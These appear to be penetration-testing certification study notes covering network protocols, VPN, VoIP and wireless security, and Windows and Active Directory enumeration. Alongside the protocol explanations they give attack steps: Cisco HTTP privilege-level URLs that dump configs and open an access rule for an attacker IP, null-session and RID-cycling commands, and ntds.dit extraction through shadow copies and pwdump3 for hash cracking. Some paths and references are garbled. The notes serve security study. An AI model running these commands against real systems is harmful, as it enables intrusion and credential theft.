- 19. TFTP TFTP is a minimal file transfer protocol that does not provide subcommands to list remote files, and does not require authentication. Basic commands are [-i] host [GET | PUT] source [destination] where -i is for binary transfer. UDP port 69. It (server) is not installed by default on any Windows platform. Cisco Reverse Telnet Reverse telnet is used mostly for connecting to the console port of a router, a switch or other device. NTP Implementations send and receive timestamps using the UDP port 123. They can also use broadcasting or multicasting, where clients passively listen to time updates after an initial round-trip calibrating exchange. NTP is intended to synchronize all participating computers to within a few milliseconds of Coordinated Universal Time (UTC). NTP uses a hierarchical system of time sources. Each level of this hierarchy is termed a stratum and is assigned a number starting with zero for the reference clock at the top. Stratum 0 are high-precision timekeeping devices and are also known as reference clocks. Stratum 3 are computers that are synchronized to stratum 2 servers and can act as servers for stratum 4 computers, and so on. The upper limit for stratum is 15; stratum 16 is used to indicate that a device is unsynchronized. The 64-bit timestamps consist of a 32-bit part for seconds and a 32-bit part for fractional second. NTP uses an epoch of January 1, 1900. NTPv4 introduces a 128-bit date format: 64 bits for the second and 64 bits for the fractional- second. NTP is not human understandable time, as not one time is received. Synchronizing a client to a network server consists of several packet exchanges where each exchange is a pair of request and reply. When sending out a request, the client stores its own time (originate timestamp) into the packet being sent. When a server receives such a packet, it will in turn store its own time (receive timestamp) into the packet, and the packet will be returned after putting a transmit timestamp into the packet. When receiving the reply, the receiver will once more log its own receipt time to estimate the travelling time of the packet. The travelling time (delay) is estimated to be half of "the total delay minus remote processing time", assuming symmetrical delays. Only if the replies from a server satisfy the conditions defined in the protocol specification, the server is considered valid.
- 20. Reference Timestamp The time the system clock was last set or corrected, in 64-bit time-stamp format. Originate Timestamp The time at which the request departed the client for the server, in 64-bit time-stamp format. Receive Timestamp The time at which the client request arrived at the server in 64-bit time-stamp format. Transmit Timestamp The time at which the server reply departed the server, in 64-bit time-stamp format. NTP servers can be susceptible to man-in-the-middle attacks unless packets are cryptographically signed for authentication. NTP message spoofing can be used to move clocks on client computers and allow a number of attacks based on bypassing of cryptographic key expiration. Replay-delay attacks, MITM D2 - Network Traffic Analysis Techniques for local network traffic analysis. Analysis of network traffic stored in PCAP files. D3 - Networking Protocols Security issues relating to the networking protocols: ARP - ARP spoofing, ARP cache poisoning, or ARP poison routing, is a technique by which an attacker sends (spoofed) Address Resolution Protocol (ARP) messages onto a local area network. DHCP - There are two different classes of potential security problems related to DHCP: Unauthorized DHCP Servers, Unauthorized DHCP Clients. CDP – The Cisco Discovery Protocol is a proprietary layer 2 protocol that all Cisco devices can use by default. CDP discovers other Cisco devices that are directly connected. 10:41:55.398940 snap 0:0:c:20:0 CDP v2, ttl: 180s, checksum: 692 (unverified) Device-ID (0x01), length: 25 bytes: 'MYSWITCH01.net.somecompany.com' Cisco Discovery Protocol runs on all media that support Subnetwork Access Protocol (SNAP), LAN, Frame Relay, and ATM media. Cisco Discovery Protocol runs over the data link layer only. Therefore, two systems that support different network-layer protocols can learn about each other. The Subnetwork Access Protocol (SNAP) is a mechanism for multiplexing, on networks using IEEE 802.2 LLC. The SNAP header consists of a 3-octet IEEE organizationally unique identifier (OUI) followed by a 2-octet protocol ID. CDP may be used between Cisco routers, switches and other network equipment to advertise their software version, capabilities and IP address. CDP spoofing is the creation of forged CDP packets that impersonate other devices, either real or arbitrary. CDP cache pollution – CDP table becomes unusable because it contains a lot of false information
- 21. HSRP - HSRP provides redundancy for IP networks ensuring that traffic can transparently recover from first hop failures. Devices which share a common layer 2 domain participate in a virtual router environment ensuring that a single device assumes the egress routing role. By continually exchanging HSRP messages, eligible devices can automatically takeover routing responsibilities if issues arise with the active device. VRRP - The Virtual Router Redundancy Protocol (VRRP) is a computer networking protocol that provides for automatic assignment of available Internet Protocol (IP) routers to participating hosts. This increases the availability and reliability of routing paths via automatic default gateway selections on an IP subnetwork. VTP - VLAN Hopping – Yersinia. The VLAN Trunking Protocol (VTP) is a proprietary Cisco protocol designed to make life easy by automatically propagating VLAN information throughout network. Layer 2 attacks. Attacks: Sending VTP Packet, deleting all VTP VLANs, deleting one VLAN, adding one VLAN STP - STP Attack – involves an attacker spoofing the root bridge in the topology bridge in the topology. Spanning tree functions must be disabled on all user interfaces but maintained for Network to Network Interfaces to avoid a network loop. Use Ethercap to establish a bridge and Yersinia to send crafted BPDU (Bridge Protocol Data Unit). TACACS+ - Security principle is known as Authentication, Authorization and Accounting (AAA). The two main AAA protocols commonly used in enterprise networks today: TACACS+ and RADIUS. Terminal Access Controller Access- Control System (TACACS) is a protocol set created and intended for controlling access to UNIX terminals. Cisco created a new protocol called TACACS+ TACACS+ uses Transmission Control Protocol (TCP) port 49 to communicate between the TACACS+ client and the TACACS+ server. An example is a Cisco switch authenticating and authorizing administrative access to the switch’s IOS CLI. The switch is the TACACS+ client, and Cisco Secure ACS is the server. Vulnerabilities of TACAS+ 1. Lack of integrity checking - Almost no integrity checking exists in TACACS+. 2. Vulnerability to replay attacks - duplicate accounting records can be produced, possibly with forged task_id fields to avoid detection. 3. Forced session-id collisions - The encryption of reply packets can be compromised. 4. The birthday paradox and session_id's - given enough sessions, encryption of many may be compromised. Another problem with session_id's is that they're too small to be unique if randomly chosen. 5. Lack of padding -the lengths of user passwords can be determined. 6. MD5 context leak D4 - IPSec Enumeration and fingerprinting of devices running IPSec services. Open UDP port 500 and permit IP protocol numbers 50 (ESP) and 51 (AH) on both inbound and outbound firewall filters. ESP and AH are layer 4 protocols, on the same level as TCP (IP proto 6) and UDP (IP proto 17) You can use nmap to identify the ISAKMP service on UDP port 500. After identifying accessible ISAKMP services, you can probe and investigate these services to fingerprint and identify them. Remote users who require remote access to internal network resources often use a pre-shared key (PSK) to authenticate. A serious flaw exists in IPsec, which can be exploited if a VPN gateway supports aggressive mode IKE, and a PSK is used to provide authentication. A remote attacker can attempt to authenticate using aggressive mode IKE and obtain a hashed authentication response from the gateway. When using main mode IKE, this authentication response is protected using a Diffie- Hellman shared secret, but aggressive mode doesn't provide any protection. If a PSK is in use (as opposed to digital signatures or public key encryption), the aggressive mode IKE authentication response is the PSK hashed using MD5 or SHA1. This hash can be attacked offline, and the PSK compromised.
- 22. VPNs can be classified into two primary types. Site-to-Site VPNs, and Remote Access VPNs. We will look at layer-3 IPsec VPNs that require a thick VPN client, as opposed to SSL-based VPNs that require only a browser on the client machine to establish connectivity to internal resources like file and mail servers. IPsec is based on symmetric-key encryption and consists of the following primary security components: Authentication Header (AH): This is essentially a message authenticity checksum that is appended to every packet to ensure its authenticity and protect its integrity as it traverses the Internet. Encapsulating Security Payload (ESP): This is the encryption mechanism used to protect the confidentiality of communication between the subjects. Internet Key Exchange (IKE): This protocol provides a means to securely exchange the secret key, which is essential for the effective operation of the AH and ESP between the communicating subjects. While the secret keys can be manually exchanged, such a solution is not scalable and the keys should be changed periodically to minimize the probability of their compromise. IKE has two modes - IKE Main Mode and IKE Aggressive Mode. Main Mode key-exchange uses the Diffie-Helman exchange to generate a mutual shared key between the client and the server. On the other hand, Aggressive Mode does not use a Diffie-Helman exchange to protect the authentication data. Therefore, it is possible to capture this authentication data using a sniffer and crack it offline. The main objective of this phase is to discover any vulnerabilities in the VPN implementation that an attacker may be able to exploit. This is usually considered a zero-knowledge test where only the IP address of the VPN server is known. This phase will be shown using three steps: 1. Reconnaissance: determining open ports and doing VPN fingerprinting 2. Assessment of PSK protocol mode 3. Exploitation of any default user accounts The first step in the reconnaissance process entails port scanning the VPN server to make an educated guess on the type of VPN implementation. The following table provides a mapping of open ports to VPN type, using default ports: PPTP PPTP uses TCP 1723 and IP protocol 47 (GRE) to encrypt data between peers. D5 - VoIP Enumeration and fingerprinting of devices running VoIP services. Ports 5060 & 5061 - SIP (VoIP) on TCP and UDP, are associated to the Session Initiation Protocol (SIP). Port 5060 is commonly used for non-encrypted signalling traffic whereas port 5061 is typically used for traffic encrypted with Transport Layer Security (TLS). Knowledge of the SIP protocol – (Session Initiation Protocol) Like HTTP it is client server model, not client to client in that one handset talks to another as communication is done through the server. There are two different types of SIP messages: requests and responses.
- 23. The first line of a request has a method, defining the nature of the request, and a Request-URI, indicating where the request should be sent. Example: REGISTER The first line of a response has a response code. Example: 200 is success. 1xx - Provisional Messages. 2xx - Success Answers. 3xx - Redirection Answers. 4xx - Method Failures: 401 – Unauthorised, 403 - Forbidden 5xx - Server Failures. 6xx - Global Failures. You can sniff the traffic and run it through sipcrack suite. Authentication data includes user ID, SIP extension, password hash (MD5) and victim’s IP address. There are six basic methods (defined in RFC 254) for the client requests: HELLO - Fake command, does not exist in SIP. INVITE: Invites a user or a service to a new session or to modify parameters of an established session. Username enumeration - The invite message initiates a SIP dialog with the intent to establish a call. It is sent by a user agent client to a user agent server. (Followed by OK – see diagram above showing flow) Caller ID Spoofing (Stealth), but the invite method generates the ring at the client side. There are numerous ways to craft a malformed SIP INVITE messages (scapy, SIPp). ACK: Sent after a response, the application detects what accounts are defined on the SIP server. Confirms the session establishment OPTIONS: Request information about the capabilities of a server. BYE: End of a session CANCEL: Cancel a pending request
- 24. REGISTER (to IP-PBX server): Register the user agent when new client is connected/reconnected to the network by sending REGISTER request to IP-PBX server for registering the associated user ID/extension number. Also implements a location service for user agents, which indicate their address information to the server. sip-enum-users – Nmap script works by sending REGISTER SIP requests to the server with the specified extension and checking for the response status code in order to know if an extension is valid. If a response status code is 401 or 407, it means that the extension is valid and requires authentication. If the response status code is 200, it means that the extension exists and doesn't require any authentication while a 403-response status code means that extension exists but access is forbidden. Is this more stealth as it’ll not generate ring on client? There are additional methods that can be used. For example, INFO, SUBSCRIBER, etc. (published in other RFCs) SUBSCRIBE – Initiates a subscription for notification of events from a notifier. PRACK - Provisional acknowledgement. NOTIFY - Inform a subscriber of notifications of a new event. PUBLISH - Publish an event to a notification server. INFO - Send mid-session information that does not modify the session state. REFER - Ask recipient to issue SIP request for the purpose of call transfer. MESSAGE - Transport text messages. UPDATE - Modifies the state of a session without changing the state of the dialog. The Session Initiation Protocol (SIP) is a communications protocol for signalling and controlling multimedia communication sessions in applications of Internet telephony for voice and video calls, in private IP telephone systems, as well as in instant messaging over Internet Protocol (IP) networks. SIP is only involved for the signalling operations of a media communication session and is primarily used to set up and terminate voice or video calls. Voice and video media streams are typically carried between the terminals using the Real-time Transport Protocol (RTP) or Secure Real-time Transport Protocol (SRTP). Under SIP, each resource, such as a user agent or a voicemail box, is identified by a Uniform Resource Identifier (URI). D6 - Wireless Enumeration and fingerprinting of devices running Wireless (802.11) services. airodump-ng wlan0mon - will show surrounding wireless networks along with their statuses. airodump-ng wlan0mon -w jdw-1 :: Will output data into jdw-1.csv which can then be opened in visualiser for easier analysis. Wireshark on Wlan interface to view better packet data Knowledge of various options for encryption and authentication, and the relative methods of each.
- 25. WEP - Wired Equivalent Privacy (WEP) is the original 802.11 pre-shared key mechanism, utilizing RC4 encryption. WEP is vulnerable to being hacked; the encryption key can be derived by an eavesdropper who sees enough traffic. WEP used a 64-bit or 128-bit encryption key that must be manually entered on wireless access points and devices and does not change. Weakness are: Passive attacks to decrypt traffic based on statistical analysis. Active attack to inject new traffic from unauthorized mobile stations, based on known plaintext. Active attacks to decrypt traffic, based on tricking the access point. Dictionary-building attack that, after analysis of about a day's worth of traffic, allows real-time automated decryption of all traffic. WEP's major weakness is its use of static encryption keys which can be derived from enough traffic analysis. WPA – WPA (Wi-Fi Protected Access). WPA was originally meant as a wrapper to WEP to tackle the insecurities caused by WEP. It was meant as a quick fix until WPA2 became available. The only attack known, besides flaws in firmware of some routers, is brute forcing the WPA key. There are two modes in which it can operate: 1. WPA-PSK: Preshared key (password) – also known as Shared authentication, or WPA personal 2. WPA-Enterprise (802.1x authentication (for Wired and Wi-Fi networks) – Supplicant, Authenticator, Authentication Server) This requires a RADIUS server and can be combined with an Extensible Authentication Protocol (also known as EAP authentication which establishes a secure tunnel between participants involved in an authentication exchange). WPA personal implements the Temporal Key Integrity Protocol (TKIP) with RC4 encryption. TKIP employs a per- packet key, meaning that it dynamically generates a new 128-bit key for each packet and thus prevents the types of attacks that compromised WEP. WPA also includes a Message Integrity Check, which is designed to prevent an attacker from altering and resending data packets. This replaces the cyclic redundancy check (CRC) that was used by the WEP standard. WPA uses a message integrity check algorithm called TKIP to verify the integrity of the packets. TKIP is much stronger than a CRC, but not as strong as the algorithm used in WPA2. WPA2 - WPA2 uses an encryption device that encrypts the network with a 256-bit key. The most important improvement of WPA2 over WPA was the usage of the Advanced Encryption Standard (AES) for encryption. WPA2 does not use TKIP but CCMP for cryptographic encapsulation. At this time the main vulnerability to a WPA2 system is when the attacker already has access to a secured Wi-Fi network and can gain access to certain keys to perform an attack on other devices on the network. Enterprise Authentication 802.1X PNAC – Port based Network Access Control can use EAP, as can Wi-Fi. By using the Extensible Authentication Protocol (EAP) to interact with an EAP-compatible RADIUS server, the access point helps a wireless client device and the RADIUS server to perform mutual authentication. WPA2 and WPA use five different EAP types as authentication mechanisms. There are currently about 40 different methods defined. EAP choice depends on the level of security you need and your server/client specs. Although there are more than ten EAP types. Popular ones are: LEAP: A proprietary method by Cisco (light weight extensible authentication protocol) was used early on. It is based on Microsoft CHAP, which means that the information that’s being sent between these devices has a few security shortcomings.
- 26. PEAP: (Protected Extensible Authentication Protocol) was created by Cisco, Microsoft and RSA Security to come up with a way to encrypt all communication. EAP-TLS: Unlike most TLS implementations of HTTPS, such as on the World Wide Web, the majority of implementations of EAP-TLS require client-side X.509 certificates. The requirement for a client-side certificate, gives EAP-TLS its authentication strength and illustrates the classic convenience vs. security trade-off. EAP-MD5: Offers minimal security; (MD5 hash) does not support key generation, which makes it unsuitable for use with dynamic WEP, or WPA/WPA2 enterprise. EAP-MD5 differs from other EAP methods in that it only provides authentication of the EAP peer to the EAP server but not mutual authentication. By not providing EAP server authentication, this EAP method is vulnerable to man-in-the-middle attacks. EAP-MD5 support was first included in Windows 2000 and deprecated in Windows Vista. EAP Protected One-Time Password (EAP-POTP) - uses one-time password (OTP) tokens, such as a handheld hardware device or a hardware or software module running on a personal computer, to generate authentication keys. EAP-POTP can be used to provide unilateral or mutual authentication and key material in protocols that use EAP. The EAP-POTP method provides two-factor user authentication, meaning that a user needs both physical access to a token and knowledge of a personal identification number (PIN) to perform authentication. EAP Pre-Shared Key (EAP-PSK) - Mutual authentication and session key derivation using a pre-shared key (PSK). It provides a protected communication channel, when mutual authentication is successful, for both parties to communicate and is designed for authentication over insecure networks such as IEEE 802.11. EAP Password (EAP-PWD) - Uses a shared password for authentication. The password may be a low-entropy one and may be drawn from some set of possible passwords, like a dictionary, which is available to an attacker. The underlying key exchange is resistant to active attack, passive attack, and dictionary attack. EAP Tunnelled Transport Layer Security (EAP-TTLS) - EAP Tunnelled Transport Layer Security (EAP-TTLS) is an EAP protocol that extends TLS. Windows started EAP-TTLS support with Windows 8. The client can, but does not have to be authenticated via a CA-signed PKI certificate to the server. This greatly simplifies the setup procedure since a certificate is not needed on every client (as compared with EAP-TLS). After the server is securely authenticated to the client via its CA certificate and optionally the client to the server, the server can then use the established secure connection ("tunnel") to authenticate the client. It can use an existing and widely deployed authentication protocol and infrastructure, incorporating legacy password mechanisms and authentication databases, while the secure tunnel provides protection from eavesdropping and man-in-the-middle attack. Note that the user's name is never transmitted in unencrypted clear text, improving privacy. D7 - Configuration Analysis Analysing configuration files from the following types of Cisco equipment: Cisco HTTP Arbitrary Access vulnerability Cisco devices have a number of privilege levels, these levels start at 0 (User EXEC) and go up to 100, although mostly only the first 15 are used. Level 15 is Privileged EXEC mode, the same as enable mode. By referring to these levels within the URL of the target device, an attacker could pass commands to the router and have them execute in Privilege EXEC mode. Web browse to the Cisco device: http://<IP> Click cancel to the logon box and enter the following address: http://<IP>/level/99/exec/show/config You may have to scroll through all of the levels from 16-99 for this to work. To raise the logging level to only log emergencies: http://<IP>/level/99/configure/logging/trap/emergencies/CR To add a rule to allow Telnet:
- 27. http://<IP>/level/99/configure/access-list/100/permit/ip/host/<Hacker-IP>/any/CR Interpreting the configuration of other manufacturers’ devices. https://www.cisco.com/E- Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/07_basic_commands_tasks.htm
- 28. Appendix E: Microsoft Windows Security Assessment NetBIOS LOC-SRV 135/TCP Used for RPC client-server communication (DCE endpoint) LOC-SRV 135/UDP Used for RPC client-server communication (DCE endpoint) NETBIOS-NS 137/UDP Name Service Name Table (NBT)- Local NetBIOS browser, naming, and lookup services NETBIOS-DGM 138/UDP Datagram Service used for local NetBIOS browser, naming, and lookup services NETBIOS-SSN 139/TCP Session Services - used for Authentication and File Sharing MICROSOFT-DS 445/TCP CIFS Server MICROSOFT-DS 445/UDP Windows RPC Epdump is a MS command line tool to query RPC endpoints. Rpcdump is another useful tool. Epdump 192.168.0.1 The response will show NetBIOS names and IP addresses. It will also show for example, the Messenger Service is accessible through UDP port 1028, along with named pipes (PIPEntsvcs). Named pipes are accessible through SMB upon authenticating. E1 - Domain Reconnaissance Identifying domains/workgroups and domain membership within the target network. echo %userdomain% or as listed in SET will show domain membership NetBIOS Name Server – Accessible through UDP 137. It provides NetBIOS Name Table (NBT). nbtstat -n nbtstat -A remote-ip net user <userName> /domain - It will list both Local and Global groups that user belongs to. Adding user: net user username password /add net config workstation - list domain info Master Browser NBTSTAT -A x.x.x.x / -n __MSBROWSE__.<01> GROUP Registered # Master browser SUPERMAN <00> UNIQUE Registered # Hostname ASIA <00> GROUP Registered # Domain/Workgroup ..or UNIQUE 1B (Domain Master Browser), 1D (Master Browser) Also, can use: browstat getmaster devicenetbt_el59x1 domainname NetBIOS Datagram Service – Accessible through UDP 138. NetBIOS Session Service – Accessible through TCP 139 – Facilitates Authentication. Can use null session – net usetargetIPC$ “” /user: “” Tools: Enum – By defaults attempts null session but can specify username and password. Winfo is similar tool. Both of these “forward lookup tools” tools can be restricted if admin sets RestrictAnonymous = 1 RID Cycling GetAcct performs reverse lookup for Windows Server RID values to get user account names, known as RID cycling. NT4 can only set RestrictAnonymous = 1 so is susceptible to RID cycling. Windows 2000 Server have extended anonymous protection and can set RestrictAnonymous = 2, so is not susceptible?
- 29. By default, Windows 2000 and 2003 servers allow anonymous access to (null session) SMB. If null session not permitted, a valid username and password must be provided to access the LSARPC and SAMR interfaces. Rpcclient is part of the Unix Samba package can be used to interact with RPC endpoints across SMB and named pipes. Useful command as part of rpcclient is lookupsids which allows SIDs to username lookups (RID cycling). Below it is used against a remote system to perform RID cycling, it first looks up full SID value of chris account using the WEBSERV account, and then increments the RIF value (1001 to 1007) to enumerate other user accounts through the LSARPC interface: rpcclient -I 192.168.0.25 -U=chris%password WEBSERV rpcclient> lookupnames chris chris S-1-xxxxx-1003 (User: 1) rpcclient> lookupsids S-1-xxxxx-1001 Every Windows user, computer, or service account has a unique alphanumeric identifier called the security ID (SID). Example SID: S-1-5-21-4064627337-2434140041-2375368561-1036 1036 is the RID – The RID uniquely identifies a security principal relative to the local or domain security authority that issued the SID. Any group or user that the Windows OS doesn't create has a RID of 1000 or greater by default. S identifies the following string as a SID. The red text is the domain or local computer identifier. If you create a user object, delete it, then recreate it with the same name, the new object won't have the same SID as the original object. Through a process of RID cycling it is possible to enumerate all domain users from a Windows 2003 domain controller. This method will work on Windows 2003 domain controllers, as the SID of the “domain users” group can then be enumerated; this was done to ensure a good level of compatibility and the same technique will not work on Windows 2008 domain controllers. With this information it is then possible to iterate through the RIDs to enumerate users. The following is an example of automated username enumeration using GetAcct from a Windows 2003 domain controller: LSA brute forcing can be done anonymously against Windows 2000 and requires a guest account or better on other systems. This isn't a brute-force technique in the common sense, however: it's a brute-forcing of users' RIDs. A user's RID is a value (generally 500, 501, or 1000+) that uniquely identifies a user on a domain or system. An LSA function is exposed which lets us convert the RID (say, 1000) to the username (say, "Ron"). Identifying key servers within the target domains. Grab list of domain controllers from last step for each domain. nslookup -type=SRV _ldap._tcp. Zone transfer _msdcs zone and ad zones.
- 30. Identifying and analysing internal browse lists. net view May show all computers in network net view /domain Shows number of domains and workgroups in environment net view /ALL /Domain:demo.com View the users and groups of an AD Security group net group /domain TheGroupName net localgroup /domain net localgroup administrators net localgroup administrators /domain net group /domain net group "Domain Admins" /domain Identifying and analysing accessible SMB shares net share SYSVOL - Sysvol is an important component of Active Directory. The Sysvol folder is shared on an NTFS volume on all the domain controllers in a particular domain. Sysvol is used to deliver the policy and logon scripts to domain members. By default, SYSVOL includes two folders: 1. Policies - (%SystemRoot%SysvolSysvoldomain_namePolicies) - The “shell” for the GPO is a folder, which is stored under the Policies folder (GPT). 2. Scripts (shared with the name NETLOGON) - (%SystemRoot%SysvolSysvoldomain_nameScripts) By default, the SYSVOL share, allows read-only access to the Everyone user context. However, the NTFS permissions for the SYSVOL folder (C:WindowsSYSVOL be default) restrict read-only access to the Authenticated Users context. So, by default, only domain authenticated users will be granted read privileges to the SYSVOL share. E2 - User Enumeration Identifying user accounts on target systems and domains using NetBIOS, SNMP and LDAP. https://gist.github.com/its-a-feature/1a34f597fb30985a2742bb16116e74e0 net user Shows local users net user /domain Shows list of users in domain net user "account name" /domain Shows user details snmpwalk -c public -v1 192.168.1.1 1.3.6.1.4.1.77.1.2.25 ldapsearch -H ldap://test.local -b DC=test,DC=local "(objectclass=user)" or objectclass=computer if enumerating computers wmic useraccount get Enumerate all domain user accounts. auxiliary/scanner/smb/smb_lookupsid SMBDomain=. MaxRID=10000 RHOSTS= E > domain_users.txt SNMP: Metasploit auxiliary/scanner/snmp/snmp_enumusers
- 31. E3 - Active Directory Active Directory Roles (Global Catalogue, Master Browser, FSMO) Because an Active Directory role is not bound to a single DC, it is referred to as a Flexible Single Master Operation (FSMO) role. Currently in Windows there are five FSMO roles: Schema master Domain naming master RID master PDC emulator Infrastructure master Flexible Single Master Operation Roles (FSMO) - removes the need for a PDC (primary domain controller) and many BDCs (backup domain controllers) by spreading tasks among controllers. The global catalogue is a distributed data repository that contains a searchable, partial representation of every object in every domain in a multidomain Active Directory Domain Services (AD DS) forest. The global catalogue is stored on domain controllers that have been designated as global catalogue servers and is distributed through multi- master replication. Searches that are directed to the global catalog are faster because they do not involve referrals to different domain controllers. The Master Browser is responsible for the browse list within its respective subnet and portion of the domain on its subnet. The Domain Master Browser is used to collect information from each of the Master Browsers via the NetServerEnum API call. Once collected the list is merged with the Domain Master Browsers list for its own subnet. This merged list forms the enterprise wide browse list for the domain. This merged list is then distributed to the Master Browsers in each subnet so that the enterprise list can be available to computers requesting services. Reliance of AD on DNS and LDAP Active Directory (AD) uses DNS as its locator service to support the various types of services that AD offers, such as Global Catalog (GC), Kerberos, and Lightweight Directory Access Protocol (LDAP). When you install Active Directory and the DNS Server role on your first Domain Controller in the domain, it automatically creates two forward lookup zones for your domain. If your AD domain is ad.example.com as in the example above, you'll have a zone for ad.example.com and the subdomain _msdcs.ad.example.com. The _msdcs zone holds all of the records that your client machines need to find domain controllers. It includes records to locate AD sites. It has records for the different FSMO role holders. It hosts only DNS SRV (service) records that are registered by Microsoft-based services Global Catalog Service - _gc.tcp Domain Controllers - _ldap.tcp # domain controllers identified by LDAP Kerberos Authentication - _kerberos.tcp The ad.example.com zone holds all of the records for your client computers, member servers, and the A records for your Domain Controllers. Why is this zone important? So that your workstations and servers can communicate with
- 32. each other on the network. If this zone didn't exist, you could probably log in, but you wouldn't be able to do much else except browse the Internet. The Lightweight Directory Access Protocol (LDAP) is a directory service protocol that runs on a layer above the TCP/IP stack. It provides a mechanism used to connect to, search, and modify Internet directories. You can query LDAP anonymously using ldp.exe. The ldpsearch tool is a simple Unix-based alternative. ldpsearch -h 192.168.0.65 An attacker can launch a brute-force, password guessing attack to compromise user accounts. The Unix bf_ldap tool is useful for this purpose. Windows uses an LDAP service called Global Catalog (GC) on TCP port 3268. GC stores a logical representation of all the users, servers and devices within a Window AD infrastructure. You can use ldp.exe and ldapsearch utilities (along with valid username and passwords) to enumerate users, servers, policies and other information. Just remember to point to port 3268 instead of 389. Group Policy (Local Security Policy) net accounts - list account policy E4 - Windows Passwords Password policies (complexity, lockout policies) Kerberos Golden Ticket If you have domain admin/local admin access on an Active Directory forest/domain, you can manipulate Kerberos tickets to get unauthorized access. In AD, accounts sign in with a username and password, and get back a Kerberos ticket that contains their authentication token. An attacker needs to log into the DC and dump the password hash for the KRBTGT account to create the Golden Ticket. The Golden Ticket is the Kerberos authentication token for the KRBTGT account, a special hidden account with the job of encrypting all the authentication tokens for the DC. That Golden Ticket can then use a pass- the-hash technique to log into any account. Account Brute Forcing Hash Storage (merits of LANMAN, NTLMv1 / v2) LM hash (also known as LanMan hash or LAN Manager hash) is a compromised password hashing function that was the primary hash that Microsoft LAN Manager and Microsoft Windows versions prior to Windows NT used to store user passwords. The LM hashing algorithm is very old and is considered very insecure. Windows stored both LM and NTLM hashes by default until Windows Vista/Server 2008, from which point only NTLM hashes were stored (along with the empty LM hash AAD3B435B51404EEAAD3B435B51404EE). LANMAN Hash: Convert all lower case to UPPER CASE Pad password to 14 characters with NULL characters Split the password to two 7-character chunks Create two DES keys from each 7-character chunk DES encrypt the string "KGS!@#$%" with these two chunks Concatenate the two DES encrypted strings. This is the LM hash. That 16-byte string is the LANMAN hash that's stored in the SAM file 1. Passwords are not case sensitive. All passwords are converted into uppercase before generating the hash value. Hence it takes password, PassWord, PaSsWoRd, PASSword and other similar combinations same as PASSWORD converting all characters to uppercase.
- 33. 2. Password characters are also limited to a subset of 95 characters in the 256-byte ASCII character set. 3. Password length is limited to maximum of 14 characters 4. A 14-character password is broken into 7+7 characters and the hash is calculated for the two halves separately. 5. If the password is 7 characters or less, then the second half of hash will always produce same constant value (0xAAD3B435B51404EE). Therefore, if the length of password is less than or equal to 7 characters, then a password length of 7 characters or less can be identified visibly without using tools. 6. The hash value is sent to network servers without salting, making it susceptible to man-in-the- middle attacks such as replay the hash, and also allowing rainbow tables to be constructed. NTLM (v1) (NT Hash) is the successor to the authentication protocol in Microsoft LAN Manager (LANMAN). The algorithm: MD4(UTF-16-LE(password)) NTLM version 2 (NTLMv2), which was introduced in Windows NT 4.0 SP4 (and natively supported in Windows 2000), enhances NTLM security by hardening the protocol against many spoofing attacks, and adding the ability for a server to authenticate to the client. NTLMv2 is the challenge-response protocol for performing MS Windows password authentication over the networks. It's used any time a password needs to be provided to a Windows or Samba server and the client is not part of the Windows Active Directory domain. The deeper problem is that NTLMv1-2 provide absolutely no protection against credentials forwarding/relay or reflection attacks. This means that an active attacker (such as a man-the-middle) is sometimes able to redirect the login of the legitimate user to authenticate his own session. NTLM remains vulnerable to the pass the hash attack, which is a variant on the reflection attack which was addressed by Microsoft security update MS08-068. For example, Metasploit can be used in many cases to obtain credentials from one machine which can be used to gain control of another machine. NTLM Hash: Generating the NTLM hash is far easier than a LANMAN hash. It is simply an MD4() of the password (in Unicode). Challenge/response - Once the LANMAN and NTLM hashes have been calculated, they can't just be put on the wire. That would be vulnerable to any number of attacks, the most obvious being replay. Offline Password Analysis (rainbow tables / hash brute forcing) Distinction between SAM database on a Windows system, or the NTDS database on the Domain Controller. To further protect the password hashes these are encrypted using a key stored in the SYSTEM (C:WindowsSystem32configSYSTEM) registry hive. This second encryption step is why in order to perform a password dump for auditing, a copy of both files is needed. Hashes (for AD) are stored at c:windowsNTDSntds.dit, but is locked due to it being accessed all the time. %systemRoot%system32Config %systemRoot%repair(pre Windows XP) %systemRoot%NTDSntds.dit (Active Directory) From registry (requires System Privileges) Windows Server 2008-2016 – Use ntdsutil Windows Server 2003 - vssadmin create shadow /for=C: vssadmin list shadows - check whether any shadow copies already exist vssadmin create shadow /for=C: - create a shadow copy, then copy ntds.dit and SYSTEM vssadmin delete shadows /shadow=[GUID] - delete the shadow copy Cracking the Hashes – Tools: John the Ripper, Cain & Abel is a Windows-based tool with a host of useful features, including a password cracker. It's normally a good idea to break very weak passwords with a simple
- 34. dictionary attack and short (5 character) brute force attack first, then let the Rainbow Tables pick up the rest. E5 - Windows Vulnerabilities Knowledge of remote windows vulnerabilities, particularly those for which robust exploit code exists in the public domain. MS17-010 - nmap -Pn -p445 - open - max-hostgroup 3 - smb-vuln-ms17-010 script <ip_netblock> Knowledge of local windows privilege escalation vulnerabilities and techniques. LLMNR, NBT-NS, and, DNS Microsoft systems use Link-local Multicast Name Resolution (LLMNR) and the NetBIOS Name Service (NBT-NS) for local host resolution when DNS lookups fail. Apple Bonjour and Linux zero-configuration implementation use Multicast DNS (mDNS) to discover systems within a network. Attackers can exploit the UDP messages and direct users to malicious services. The below example illustrates the capture NTLMv2 hashes which are saved to disk and then can be cracked with John the Ripper. Knowledge of common post exploitation activities obtain password hashes, both from the local SAM and cached credentials obtaining locally-stored clear-text passwords crack password hashes Pwdump3 can remotely authenticate (against ADMIN$ share) and then extract user password hashes from the Windows 2000 host (?): Pwdump3 192.168.189.1 hashes.txt Administrator Please enter the password >secret Two tools can be used to crack Windows passwords hashes downloaded by Pwdump3: Cain & Abel – supports rainbow table cracking of NTLM hashes. John the Ripper – performs basic dictionary-based attacks. Reversion to previous state E6 - Windows Patch Management Strategies • check patch levels – qfe (quick fix engineering) wmic qfe
